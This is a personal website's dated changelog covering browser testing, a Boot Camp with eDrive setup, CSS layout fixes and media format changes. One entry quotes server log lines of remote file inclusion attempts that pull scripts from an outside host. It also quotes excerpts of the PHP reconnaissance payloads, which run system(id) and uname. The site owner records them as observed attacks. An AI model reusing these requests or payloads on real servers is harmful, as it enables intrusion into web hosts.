The Web browsers that I currently use for testing are Safari 3.2.3 for OS X 10.4.11 on my PPC Mac (PowerMac3,6, Mirrored Drive Doors 2003, PowerPC G4 1.25 GHz), Safari 4.0.3 for OS X 10.5.8 on my Intel Mac (iMac9,1, 2009, Intel Core 2 Duo 2.66 GHz), Firefox 3.5.2, Opera 6.0.3 for OS 9, Opera 9.64 for OS X, iCab 3.0.5 for OS 9, iCab 4.6 for OS X, and Internet Explorer 7 for Windows XP (Windows XP Home Edition SP3) on my Intel Mac. On these browsers, every content on www.hdever.com is currently appearing normal, but how about on your browsers? I would appreciate it if you would kindly point the problem of the appearance.

May 7, 2009

My order, a new 20-inch iMac (iMac9,1, Intel Core 2 Duo 2.66 GHz), arrived toward the end of April, and I have been delighted just to see the new features that Leopard brings to the Mac. But I decided, with Boot Camp, to try the Windows. Now that the installation of Windows XP (Windows XP Home Edition SP3) has been successful, I am able to use a Windows Web browser, Internet Explorer 7, to see whether my Web site's contents appear normal or not.

A note for myself --- as to securing the coexistence of Boot Camp (Windows XP) and TechTool Pro 5 eDrive on my iMac :
Firstly, I removed the existing eDrive partition (TechTool Pro 5.0.4) on my new iMac's startup disk, and restored the startup disk to a single volume, or a single disk partition. And then I installed an OEM version of Windows XP Home Edition Service Pack 3 (SP3) onto a Windows partition (a 32 GB partition) that was created and formatted in FAT32 by Boot Camp included with Leopard (according to the version information when I am in Mac OS X, Boot Camp Assistant is Boot Camp Assistant 2.0 and, according to the version information when I am in Windows XP, Boot Camp is Boot Camp 2.1). Secondly, I started up my iMac from the TechTool Pro 5 DVD and created an eDrive partition (a 12 GB partition for installing an essential minimum version of Leopard and a full version of TechTool Pro 5). Lastly, following Mr. Kelvin's instructions given in his November 23, 2008 post entitled "How to get working in 3min: BootCamp (XP) + eDrive" on Micromat Forum of the Micromat Web site (URL: http://www.micromat.com/),

• the Web page's URL: http://www.micromat.com/index.php?option=com_simpleboard&Itemid=42&func=view&id=8345&catid=6
• the PDF edition's URL: http://www.micromat.com/index.php?option=com_simpleboard&id=8345&catid=6&func=sb_pdf

I went back to Mac OS X (my main Mac OS X partition), and downloaded and installed rEFIt 0.13 (as of May 7, 2009, the current release is 0.13), "a boot menu and maintenance toolkit for EFI-based machines like the Intel Macs" [EFI = Extensible Firmware Interface] developed and published as the rEFIt Project by Mr. Christoph Pfisterer, onto Mac OS X,

• the Web site of Mr. Christoph Pfisterer's rEFIt Project URL: http://refit.sourceforge.net/

and browsed to my Windows "drive" (in the case of my iMac, a Windows "drive" named "BOOTCAMP") and opened a specified file () from the Mac side and completed it with a numerical alteration to the "partition" number in a certain line of the code, as demonstrated clearly in Mr. Kelvin's instructions. To quote his words, "Change this number to 1 digit greater, if yours is originally 3, change it to 4, etc. Save the file" (How to get working in 3min: BootCamp (XP) + eDrive, PDF Edition, p.1).
Although the above-mentioned Mr. Kelvin's post is that which deals specifically with the "BootCamp (XP) + TechTool Pro 4 eDrive" issue, yet it does apply to my "BootCamp (XP SP3) + TechTool Pro 5 eDrive" case. Thanks to Mr. Kelvin's post and Mr. Christoph Pfisterer's rEFIt, my iMac starts up, with Boot Camp (Windows XP) and eDrive coexisting on it, in the operating system or from the volume that I have selected --- between Mac OS X and Windows XP or from among two Mac OS Extended (Journaled) volumes and one MS-DOS (FAT32) volume.
Thank you very much!
A postscript: My iMac gets started up smoothly in the Windows operating system by selecting Windows from the rEFIt boot menu. In the case of my iMac, however, a black DOS screen is displayed during the Windows subsequent starting process, urging me to make a choice between "Windows (default)" and "Windows XP Home Edition," which seems a little troublesome. Hence, I have made another numerical alteration to the "partition" number appearing in another line of the code in order that the DOS screen may not be displayed.

Concerning Units of Data Transfer Rate:
The information about the audio material files will be displayed with two different units, for example, "10 K bytes/sec" and "80 kbits/s."
"Data Rate" of the audio material files that I created in 2005 and 2006 with SoundHack 0.896 and QuickTime 6 on Mac OS X Jaguar from cassette tapes (the seminar and workshop recorded on cassette tapes in 1996) will heretofore be displayed in "byte" units. "Data Rate" of the audio material files that I re-created in April, 2009 with SoundHack 0.896 and QuickTime 7 on Mac OS X Tiger will be displayed in "bit" units.
1 byte = 8 bits
1 K byte/sec = 1 Kilo-byte/sec = 1,000 bytes transferred per second
1 kbit/s = 1 Kilo-bit/sec = 1,000 bits transferred per second

Following a concrete solution to the issue "IE6 and 7's hasLayout" or "gaining a layout" that a book collectively-written by Ms. Rachel Andrew and Mr. Kevin Yank, Everything You Know About CSS Is Wrong! (Victoria: SitePoint Pty. Ltd., 2008), pp. 23-25, gave, I added the width declaration "width: 100%" to the rightmost (3rd) column div element with a property and its value "position: relative," for I would like to display the three-column layout with the CSS position property -- an absolutely positioned leftmost (1st) column, an absolutely positioned middle (2nd) column, and a relatively positioned rightmost (3rd) column -- correctly.
Thanks to the solution presented in their co-authored book, the result was perfect, when seen by Internet Explorer 6.0 on a Windows XP machine and even by Internet Explorer 5.5 on a Windows 2000 machine, according to screenshots of my pages made today through the Cross Platform Browser Test - Browsershots (URL: http://browsershots.org/), or a free open-source online service created by Mr. Johann C. Rocholl, as shown below.
Thank you very much!

I moved several Japanese text images and classical Chinese-style Japanese text images from the Root directory into the "japanesetext" directory.
To cite two cases:
1. genkoshakusho700x455 JPEG image's URL was

Build Your Own Web Site The Right Way book cover
Mr. Ian Lloyd's book, Build Your Own Web Site The Right Way Using HTML & CSS, Second Edition (Victoria: SitePoint Pty. Ltd., 2008), that I read recently prompted me to begin learning about CSS. This book is attentive and intelligible, and a great introduction to "the right way" (building a Web site the right way) for anyone, like me, who is unfamiliar with it, and that with complete code for all the examples presented in the book.
Every single page of www.hdever.com had had an embedded style sheet. But I created two external CSS files (one for English pages, the other for Japanese pages) that could be shared among most of Fushidansekkyo-theme pages, and have started using external style sheets on my site, though embedded style sheets will still be used on pages, each of which has a unique style, including Top Page and Site Maps.
In the external CSS file for Japanese pages, I have newly specified the primary Font Family (font-family:"Hiragino Mincho Pro","MS PMincho","MS Mincho",serif;).
Now, I am checking to see if the Mac Web browsers (as named previously) will render HTML documents using my external style sheets.

I increased the total width of Top Page (Home).
3 + 280 + 30 + 280 + 30 + 266 = 889

This is not about "change." But I am going to write down as a note for myself.
The following access attempts have been made since last week, the requests of which have been centered around my English "News" page, and it would appear to me that they are attacks from those who target a vulnerability.
To cite a few cases:

"GET /bonenkaie.html//parse/parser.php?WN_BASEDIR=http://their_site_name/id.txt??? HTTP/1.1" 404 12983 "-" "libwww-perl/5.79" "-"
"GET /bonenkaie.html//parse/parser.php?WN_BASEDIR=http://their_site_name//wp-content/uploads/id2.txt?? HTTP/1.1" 404 12983 "-" "libwww-perl/5.79" "-"
"GET /bonenkaie.html//parse/parser.php?WN_BASEDIR=http://their_site_name/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 12983 "-" "libwww-perl/5.805" "-"
"GET /bonenkaie.html//parse/parser.php?WN_BASEDIR=http://their_site_name/templates/rhuk_milkyway/glup.txt? HTTP/1.1" 404 12983 "-" "libwww-perl/5.79" "-"
"GET //parse/parser.php?WN_BASEDIR=http://their_site_name/l333tbi1t.txt???? HTTP/1.1" 404 12983 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "-"

In the above instances, when checking "http://their_site_name/zboard/DQ_LIBS/icon/safe1.txt???," the payload code (script) is:

(omit the first part)
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user:$alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "NigeriaN HackerS TeaM<br>";
(omit the rest)

When checking "http://their_site_name/templates/rhuk_milkyway/glup.txt?," the payload code (script) is the same as the above, except:

(omit the first part)
echo "ALBANIA<br>";
(snip)
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
(omit the rest)

When checking "http://their_site_name/l333tbi1t.txt????," the payload code (script) is:

(omit the first part)
$id1 = system(id);
$un = @php_uname();
$os = @PHP_OS;
echo "3b1tchx3mailOK<br>";
echo "id: $id1<br>";
echo "os: $os<br>";
echo "uname -a: $un<br>";
(omit the rest)

Are they seeking information on the target site or the target system?

Thanks Mr. Komatsu, I am much obliged to you. I feel relieved. (September 30, 2008)

Firefox for Mac has been updated from 2.0.0.16 to Firefox 3.0.1.

June 15, 2008

Among the Web browsers for Mac that I currently use for testing, Safari 3 for OS X 10.4.11 has been updated from 3.1 to Safari 3.1.1, Firefox 2 for Mac has been updated from 2.0.0.13 to Firefox 2.0.0.14, iCab 4 for OS X has been updated from 4.0.1 to iCab 4.1.1, and Opera 9 for OS X has been updated from 9.25 to Opera 9.50, which would appear to be a major update, with its new browser engine and superior support for Web standards.
The extra wide spacings between the words by placing the HTML character entity "em space" (&+#+8195+;) would still appear not to be reflected on Opera 9 for Mac.

Web browsers for Mac
The Web browsers that I currently use for testing are Safari 3.1 for OS X 10.4.11, Firefox 2.0.0.13, Opera 6.0.3 for OS 9, Opera 9.25 for OS X, iCab 3.0.5 for OS 9 and iCab 4.0.1 for OS X. On these browsers for Macintosh, every content on www.hdever.com is currently appearing normal, but how about on your browsers? I would appreciate it if you would kindly point the problem of the appearance.

February 20, 2008

I am no longer able to use the Safari 1.0.3 for OS X 10.2.8 Web browser, which was one of browsers I was using, for testing whether the contents appear normal or not, because the version of Mac OSX on another Mac (Apple Macintosh Computer) of mine was also upgraded from Jaguar (OSX 10.2) to Tiger (OSX 10.4).

I assigned a number to each of 17 daughter pages within the Inline Frame of the Table on the parent-page titled "A very small Library" according to their placement in the Table.
To cite two cases:
1. a daughter-page's URL was
http://www.hdever.com/library/refwetrusttheholy.html,
but it is now

Maps of the old provinces of Japan were moved with a Chronology (a Chronological Table).
I removed an abbreviated Chronological Table of the Kamakura period and Maps of the old provinces of Japan from the English page titled "Glossary of Frequent Japanese Words and Names on www.hdever.com" and placed them onto a newly created page titled "An Abbreviated Chronological Table of Kamakura Period" as an adjunct to the Glossary.
URL: http://www.hdever.com/achronologicaltable.html

June 10, 2007

I will from time to time remove my personal remarks from the "News" page in the chronological order (the oldest first), and place them onto the "Previous News Archive" page.

Although I became able to use the new H.264 video codec in QuickTime 7 to create a QuickTime movie file as the version of Mac OSX on one of my Macs (Apple Macintosh Computers) was upgraded from Jaguar (OSX 10.2) to Tiger (OSX 10.4), yet I will not alter the video codec of the "Fushidansekkyo Video Material" files from H.263 to H.264, for the convenience of QuickTime users who have QuickTime versions prior to 7, including myself.

January 18, 2007

I requested my current Web hosting provider to upgrade my Web hosting plan on January 18, 2007. Only my plan was changed, and my domain name and every URL of the pages on www.hdever.com remain the same. Problems and inconveniences, however, occurred during the period from the end of server switching from old to new (at about 3 pm JST, January 18, 2007) through until the completion of the settings necessary in the new Web hosting plan and of the upload of all the files onto the new server (at about 6 am JST, January 20, 2007), and resulted in a "404 Error" and "Mail System Error (Returned Mail)." Put simply, all the pages and e-mail accounts of www.hdever.com had disappeared from the Internet for hours.

January 8, 2007

I have begun to add the hreflang attribute, hreflang="a language code" (such as hreflang="en" and hreflang="ja"), into the anchor tag in order to provide user agents with information about the language of the Web page that the link represents.

October 18, 2006

I increased the total width of each page.

August 5, 2006

Apple and RealNetworks have encouraged Web authors to begin modifying their web pages in responding to the updated version of Internet Explorer browser for Windows which Microsoft made available in early 2006. But I won't be able to replace any code, such as EMBED tags and OBJECT tags that I am currently using for including QuickTime content and RealPlayer Media content in the pages for Fushidansekkyo Audio Video Material, with a call of JavaScript, because of my inadequate knowledge of JavaScript.

June 15, 2006

I added the audio files in MP3 format onto the "Fushidansekkyo Audio Material" pages.

May 4, 2006

www.hdever.com's electronic mailbox being flooded with unsolicited mail messages, I changed the mail address.

April 9, 2006

I halted the use of HTML 4.01 Frameset on the top page, which had had one upper frame and one lower frame.
Hence the former upper frame page
http://www.hdever.com/menu.htm
and the former lower frame page
http://www.hdever.com/info6d.htm
have merged into a single top page (http://www.hdever.com/) as HTML 4.01 Transitional.

February 8, 2006

I began to identify the primary Language and Character Set in HTML (lang="en" and content="text/html; charset=iso-8859-1" for a page written in English or lang="ja" and content="text/html; charset=EUC-JP" for a page written in Japanese) and to specify the primary Font Family in Style Sheet (font-family: Georgia, "Times New Roman", Times, serif for an English page or font-family: Japanese font names in kanji, serif for a Japanese page).

December 31, 2005

I moved those 30 daughter-pages which were within the Inline Frames of the Tables on the parent-pages titled "A Break Room with Jazz Music" and "A very small Library" into newly created directories, such as "jazz" and "library."
To cite two cases:
1. a daughter-page's URL was
http://www.hdever.com/jazz2.html,
but it is now
http://www.hdever.com/jazz/jazz2.html,
2. a daughter-page's URL was
http://www.hdever.com/refwetrusttheholy.html,
but it is now
http://www.hdever.com/library/refwetrusttheholy.html.
Tables with Inline Frames:

December 8, 2005

I started using the Web page template purchased today to make my Top Page (Home).

October 9, 2005

I created the RealPlayer media RM files for non-Mac users who could not watch the MOV files, and added the RM files onto the "Fushidansekkyo Video Material" pages.

October 7, 2005

I altered the digital audio compression format of all the AIFF files on the "Fushidansekkyo Audio Material" pages from MACE 6:1 (Stereo, 44100 Hz) to QDesign Music 2 (Stereo, 44100 Hz). I also altered the video codec of some of the QuickTime MOV files on the "Fushidansekkyo Video Material" pages from H.263 to 3ivx D 4 4.5.1.

April 28, 2005

The background-image property that I set in an internal Style Sheet failed to display on Internet Explorer for Mac (Macintosh).
So, I removed the quotation marks enclosing the URL path,
background-image:url("http://www.hdever.com/image_I_want_to_display.jpg") as an example,
and specify it with no single or double quotation marks,
background-image:url(http://www.hdever.com/image_I_want_to_display.jpg),
in the Style Sheet in order that the background image might be displayed on the Web browser for Mac.

April 27, 2005

I have declared what version of HTML is used in the document (the Document Type Declaration was placed).
